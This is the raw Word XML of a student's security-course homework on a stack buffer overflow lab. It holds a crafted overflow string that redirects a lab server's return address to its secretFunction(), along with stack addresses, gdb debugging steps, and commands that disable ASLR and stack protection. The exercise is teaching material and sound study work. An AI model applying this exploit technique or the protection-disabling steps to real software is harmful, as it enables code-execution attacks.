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DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:r>
        <w:t>Homework Number:  hw10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:r>
        <w:t>Name: Shu Hwai Teoh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:r>
        <w:t>ECN Login: teoh0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:r>
        <w:t xml:space="preserve">Due Date: </w:t>
      </w:r>
      <w:r w:rsidRPr="008666E8">
        <w:t>Thursday 4/09/2020 at 4:29PM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9"/>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>specially crafted buffer overflow string: 29*A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRPr="009B7C9E" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AAA</w:t>
      </w:r>
      <w:r>
        <w:t>AAAA\xc8\x0d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D8768C">
        <w:t>explanation of why you chose the string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 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 xml:space="preserve">address of variable str in </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7C9E">
        <w:t>clientComm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(): </w:t>
      </w:r>
      <w:r w:rsidRPr="00B60FB7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x7fffffffe42b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRPr="00512BC0" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return address of </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3A">
        <w:t>DataPrint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x0000000000400e1e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return address of </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7C9E">
        <w:t>clientComm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x0000000000400dc6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRPr="00B54E21" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>entry to the object code for the</w:t>
      </w:r>
      <w:r w:rsidRPr="00177B4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3A">
        <w:t>secretFunction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() function: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x0000000000400dc8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRPr="00A74693" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left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rbp of clientComm(): </w:t>
      </w:r>
      <w:r w:rsidRPr="00B60FB7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x7fffffffe440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Return address: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74693">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x7fffffffe4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>48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ifference between address of variable str and return address of </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3A">
        <w:t>DataPrint</w:t>
      </w:r>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9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4BE1A2A" wp14:editId="1BFE97A0">
            <wp:extent cx="4795157" cy="165862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196" cy="16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 xml:space="preserve">To overrun the stack memory location of where the stack-frame created for </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3A">
        <w:t>DataPrint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() stores the return address, the overwrite must be such that the new return address corresponds to the entry into the code for the function </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3A">
        <w:t>secretFunction</w:t>
      </w:r>
      <w:r>
        <w:t>().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 xml:space="preserve">Turn off ASLR: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F54425">
        <w:t>sudo sysctl -w kernel.randomize_va_space=0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>Compile server: gcc -fno-stack-protector -z execstack server.c -o server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 w:rsidRPr="00F9051F">
        <w:t xml:space="preserve">gcc -g </w:t>
      </w:r>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9051F">
        <w:t xml:space="preserve">.c -o </w:t>
      </w:r>
      <w:r>
        <w:t>server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>gdb server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 xml:space="preserve">(gdb) disas </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3A">
        <w:t>secretFunction</w:t>
      </w:r>
      <w:r>
        <w:t>: the last four bytes of memory address for entry to the object code for the</w:t>
      </w:r>
      <w:r w:rsidRPr="00177B4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3A">
        <w:t>secretFunction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() function is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x0000000000400dc8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (8 bytes)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>(gdb) set args 8000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 xml:space="preserve">(gdb) break </w:t>
      </w:r>
      <w:r w:rsidRPr="00454151">
        <w:t>clientComm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lastRenderedPageBreak/>
        <w:t>(gdb) break *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x0000000000400dc6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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>(gdb) run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>client 128.46.4.84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(gdb)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A74693">
        <w:t xml:space="preserve"> print /x $rsp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\x18\x0e\x00\x00\x00\x00\x00\x00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>(gdb) print /x $rsp   #0x7fffffffde40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>(gdb) cont</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>the modified parts of the server code by highlighting or underlining them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRDefault="00890DA9" w:rsidP="00890DA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">explanation of your fixes to the code: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DA9" w:rsidRPr="001E0A14" w:rsidRDefault="00890DA9" w:rsidP="00890DA9"/>
    <w:p w:rsidR="007A201E" w:rsidRPr="00890DA9" w:rsidRDefault="007A201E" w:rsidP="00890DA9">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007A201E" w:rsidRPr="00890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2D5" w:rsidRDefault="00A042D5" w:rsidP="00890DA9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A042D5" w:rsidRDefault="00A042D5" w:rsidP="0089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2D5" w:rsidRDefault="00A042D5" w:rsidP="00890DA9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A042D5" w:rsidRDefault="00A042D5" w:rsidP="00890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0A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DAEAC2E"/>
    <w:lvl w:ilvl="0" w:tplc="349E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B52308"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40323BBC"/>
    <w:lvl w:ilvl="0" w:tplc="DA86F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0C"/>
    <w:rsid w:val="00031CC2"/>
    <w:rsid w:val="007A201E"/>
    <w:rsid w:val="00890DA9"/>
    <w:rsid w:val="00A042D5"/>
    <w:rsid w:val="00A1360C"/>
    <w:rsid w:val="00A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7C90B-3D70-4529-82C0-01653F8B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0D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87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0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0D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0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0D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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-04T14:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-05T03:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>